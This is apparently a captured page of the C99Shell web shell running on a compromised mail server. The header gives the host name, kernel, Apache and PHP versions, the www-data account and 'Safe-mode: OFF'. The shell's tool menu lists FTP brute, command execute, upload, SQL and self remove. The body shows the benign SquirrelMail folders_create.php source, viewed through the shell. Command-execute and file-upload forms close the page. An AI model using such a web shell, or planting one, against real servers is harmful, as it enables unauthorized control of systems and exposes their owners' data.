!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/squirrelmail/src/   drwxr-xr-x
Free 130 GB of 142.11 GB (91.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     folders_create.php (2.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * folders_create.php
 *
 * Creates folders on the IMAP server.
 * Called from folders.php
 *
 * @copyright 1999-2010 The SquirrelMail Project Team
 * @license http://opensource.org/licenses/gpl-license.php GNU Public License
 * @version $Id: folders_create.php 13893 2010-01-25 02:47:41Z pdontthink $
 * @package squirrelmail
 */

/** This is the folders_create page */
define('PAGE_NAME''folders_create');

/**
 * Path for SquirrelMail required files.
 * @ignore
 */
define('SM_PATH','../');

/* SquirrelMail required files. */
require_once(SM_PATH 'include/validate.php');
require_once(
SM_PATH 'functions/global.php');
require_once(
SM_PATH 'functions/imap.php');
require_once(
SM_PATH 'functions/display_messages.php');

/* get globals we may need */
sqgetGlobalVar('key',          $key,           SQ_COOKIE);
sqgetGlobalVar('username',     $username,      SQ_SESSION);
sqgetGlobalVar('onetimepad',   $onetimepad,    SQ_SESSION);
sqgetGlobalVar('delimiter',    $delimiter,     SQ_SESSION);
sqgetGlobalVar('folder_name',  $folder_name,   SQ_POST);
sqgetGlobalVar('subfolder',    $subfolder,     SQ_POST);
if (! 
sqgetGlobalVar('contain_subs'$contain_subs,  SQ_POST)) {
    unset(
$contain_subs);
}
if (!
sqgetGlobalVar('smtoken',$submitted_tokenSQ_POST)) {
    
$submitted_token '';
}
/* end of get globals */

// first, validate security token
sm_validate_security_token($submitted_token3600TRUE);

$folder_name trim($folder_name);

if (
substr_count($folder_name'"') || substr_count($folder_name"\\") ||
    
substr_count($folder_name$delimiter) || ($folder_name == '')) {
    
displayPageHeader($color'None');

    
plain_error_message(_("Illegal folder name. Please select a different name.").
        
'<br /><a href="../src/folders.php">'._("Click here to go back").'</a>.'$color);

    exit;
}

$folder_name imap_utf7_encode_local($folder_name);

if (isset(
$contain_subs) && $contain_subs ) {
    
$folder_type 'noselect';
} else {
    
$folder_type '';
}

if (
$folder_prefix && (substr($folder_prefix, -1) != $delimiter)) {
    
$folder_prefix $folder_prefix $delimiter;
}
if (
$folder_prefix && (substr($subfolder0strlen($folder_prefix)) != $folder_prefix)){
    
$subfolder_orig $subfolder;
    
$subfolder $folder_prefix $subfolder;
} else {
    
$subfolder_orig $subfolder;
}

$imapConnection sqimap_login($username$key$imapServerAddress$imapPort0);

if (
trim($subfolder_orig) == '') {
    
sqimap_mailbox_create ($imapConnection$folder_prefix.$folder_name$folder_type);
} else {
    
sqimap_mailbox_create ($imapConnection$subfolder.$delimiter.$folder_name$folder_type);
}

sqimap_logout($imapConnection);

$location get_location();
header ("Location: $location/folders.php?success=create");


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0505 ]--